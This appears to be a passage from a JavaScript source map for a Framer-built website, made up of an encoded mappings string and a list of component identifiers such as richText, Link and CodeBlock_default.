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",
  "names": ["init_ssg_sandbox_shims", "richText", "u", "x", "p", "Link", "motion", "ComponentPresetsConsumer", "t", "CodeBlock_default", "richText1", "richText2", "richText3", "richText4", "richText5", "richText6", "richText7", "richText8", "__FramerMetadata__"]
}